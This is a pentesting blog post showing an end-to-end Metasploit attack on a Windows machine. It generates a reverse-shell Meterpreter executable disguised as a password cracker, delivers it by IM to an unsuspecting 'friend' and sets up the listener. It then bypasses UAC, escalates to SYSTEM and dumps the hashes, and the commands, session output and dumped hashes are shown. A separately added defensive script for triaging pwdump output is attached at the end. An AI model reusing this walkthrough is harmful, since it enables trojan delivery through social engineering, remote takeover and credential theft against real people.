crossbower

Pentesting with binary payload


Binary Payloads

It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an executable from a Metasploit payload. This can be very useful in situations such as social engineering: if you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.

Example with a little joke:

My friend needs a good passwd cracker. I created for him the best passwd cracker.

How to create a binary payload: Binary Payloads - Metasploit Unleashed

We generate a Windows meterpreter executable that will connect back to us on port 443:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=443 X > /root/cracker.exe

Now that the Windows executable is created, we will use 'exploit/multi/handler', which is a stub that handles exploits launched outside of the framework.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

And the listener started, waiting for a victim:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.19:443
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.91:443 -> 192.168.1.19:3250)

And I delivered it via IM to "my friend"... he executed the binary payload and the game started: hunting for the hashdump.

Metasploit has a Meterpreter script, 'getsystem', that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

More info on privilege escalation here: Privilege Escalation - Metasploit Unleashed

Before we take a hashdump we need to be running with SYSTEM privileges.

meterpreter > getuid
Server username: redmon-PC\redmon

I put this session (session 1) in the background and used the meterpreter module bypassuac.

Reference: Bypass Windows 7 x86/x64 UAC Fully Patched - Meterpreter Module ?

Source: Windows Escalate UAC Protection Bypass

msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 1
msf exploit(bypassuac) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(bypassuac) > set LPORT 8989
LPORT => 8989
msf exploit(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.19:5555
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (769024 bytes) to 192.168.1.202
[*] Meterpreter session 2 opened (192.168.1.19:5555 -> 192.168.1.202:49171)

Now migrate into one of the processes which is running with SYSTEM privileges.

Running the ps command we see a process we need for SYSTEM privs:

1996 448 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM

Migrating to the process SearchIndexer.exe:

meterpreter > migrate 1996
[*] Migrating from 3456 to 1996...
[*] Migration completed successfully.

Now we run the 'getsystem' techniques to attempt to gain SYSTEM level privileges.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

NOW THE SYSTEM IS READY FOR ME TO TAKE A HASHDUMP

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

I cracked the hashes with the john passwd cracker. Metasploit has jtr modules for cracking.

Sorry for mistakes, I was tired and still working at my workplace.

VIDEO TUT:

http://www.youtube.com/watch?v=j6dZIrO0890
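The hashdump output above is in pwdump format (user:RID:LM hash:NT hash:::). As an added example, not part of the original post or of Metasploit, here is a small Python triage script a responder can run over such a listing when reviewing what was exposed on a compromised host: it parses the lines (tolerating the stray whitespace that copy-and-paste tends to inject into the hex), and flags accounts with a blank password, accounts that still have an LM hash stored (a weak hash that should be disabled by policy) and the built-in RID 500/501 accounts that need rotating after a compromise. The two constants are the well-known LM and NT hashes of the empty string; the "legacy" line in the sample is constructed with made-up hash values to exercise the LM-storage check.

```python
"""Triage a pwdump-style hashdump listing (user:rid:lmhash:nthash:::)."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# LM and NT hashes of the empty string (well-known constants, not page-specific).
# An LM field equal to EMPTY_LM means no LM hash is stored for the account, which
# is the expected state; an NT field equal to EMPTY_NT means a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

HEX32 = re.compile(r"^[0-9a-f]{32}$")


@dataclass
class HashRecord:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_hash_stored(self) -> bool:
        return self.lm != EMPTY_LM

    @property
    def builtin(self) -> bool:
        # RID 500 is the built-in Administrator, 501 the built-in Guest.
        return self.rid in (500, 501)


def parse_pwdump(text: str) -> List[HashRecord]:
    """Parse pwdump lines; strip whitespace pasted into hash fields, skip junk."""
    records = []
    for raw in text.splitlines():
        fields = raw.strip().split(":")
        # Expect exactly 7 fields: user, rid, lm, nt and three trailing empties.
        if len(fields) != 7 or any(fields[4:]) or not fields[1].isdigit():
            continue
        lm = "".join(fields[2].split()).lower()
        nt = "".join(fields[3].split()).lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            continue
        records.append(HashRecord(fields[0], int(fields[1]), lm, nt))
    return records


def audit(records: List[HashRecord]) -> List[Tuple[str, str]]:
    """Return (user, finding) pairs a responder should act on."""
    findings = []
    for r in records:
        if r.blank_password:
            findings.append((r.user, "blank NT password"))
        if r.lm_hash_stored:
            findings.append((r.user, "LM hash stored (weak hash; disable LM storage)"))
        if r.builtin:
            findings.append((r.user, f"built-in account RID {r.rid}; rotate after compromise"))
    return findings


# Sample input: the four lines from the post above, plus one constructed line
# ("legacy", with made-up LM and NT values) to exercise the LM-storage finding.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
legacy:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for user, finding in audit(parse_pwdump(SAMPLE_HASHDUMP)):
        print(f"{user}: {finding}")
```

On the listing from the post, only Guest trips the blank-password check (its NT field is the empty-string hash), every account has the empty LM value, and Administrator and Guest are reported as built-in accounts to rotate.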
